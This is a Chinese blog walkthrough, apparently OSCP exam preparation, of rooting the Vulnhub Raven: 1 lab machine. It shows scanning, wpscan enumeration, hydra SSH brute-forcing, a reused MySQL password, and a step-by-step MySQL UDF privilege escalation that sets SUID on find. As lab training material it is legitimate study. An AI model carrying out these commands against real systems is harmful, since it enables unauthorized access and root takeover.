OSCP备考_0x13_Vulnhub靶机_Raven: 1

Ethan医生6个月前靶场201
名称说明
靶机下载链接https://www.vulnhub.com/entry/raven-1,256/
攻击机(kali)ip:192.168.233.168
靶机(CentOS)ip:192.168.233.180

image.png

nmap -p- 192.168.233.180 

image.png

nmap -p22,80,111,54309 -A -T4 192.168.233.180


image.png

image.png

gobuster dir -u http://192.168.233.180/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40


image.png

image.png

查找到version是5.2.16版本

查询到cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./phpmail.py

然后修改phpmail.py配置 然后攻击目标机器

image.png


执行不成功 看来还是换打wd看看

wpscan --url http://192.168.233.180/wordpress/ -eu

image.png

找到两个用户尝试爆破看看

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt 192.168.233.180 ssh


image.png

image.png

到wd底下去看MYSQL配置,密码:R@v3nSecurity

image.png

尝试登入看看

image.png

使用UDP提权 因为启用的ROOT MYSQL


mysql --version

mysql  Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (x86_64) using readline 6.3

上传恶意1518.so文件 进行UDF提权

create table ethan(line blob); (blob就是二进制保存)

image.png

insert into ethan value(load_file('/tmp/1518.so')); 将挡案导入到ethan

image.png

select * from ethan into dumpfile '/usr/lib/mysql/plugin/ethan.so'; 将挡案导出到plugin文件内

create function do_system returns integer soname 'ethan.so';

(是 MySQL UDF(用户自定义函数)提权利用的一部分,它的作用是:

告诉 MySQL 加载一个名为 ethan.so 的共享库文件,并将其中的某个函数注册为 SQL 中可以调用的函数 do_system)

image.png


select * from mysql.func;

image.png


调用do_system函数来给find命令所有者的suid权限,使其可以执行root命令:
select do_system('chmod u+s /usr/bin/find');

image.png

find . -exec "id" \;

image.png

image.png



标签: OSCP

相关文章

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

OSCP备考_0x10_HackThBox靶机_Linux_Sunday

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.252.243 (扫描TCP)nmap -sU --top-ports 100 10.129.25...

HTB.OSCP一招网络问题解决

HTB.OSCP一招网络问题解决

刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议 如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.237.97 (扫描TCP)enum4linux(自动化枚举)   ...

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remote

OSCP备考_0x54_HackThBox靶机_Windows_remotenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.230.172&nbs...

OSCP备考_0x52_HackThBox靶机_Windows_Buff

OSCP备考_0x52_HackThBox靶机_Windows_Buff

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.25.107 (扫描TCP)打开8080然后就是使用EXP然后就获取到SHELL然后EA...

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

OSCP备考_0x42_HackThBox靶机_Windows_grandpa

grandpanmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.95.233 (扫描TCP)跟上个靶场好像davtest -url 10....

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。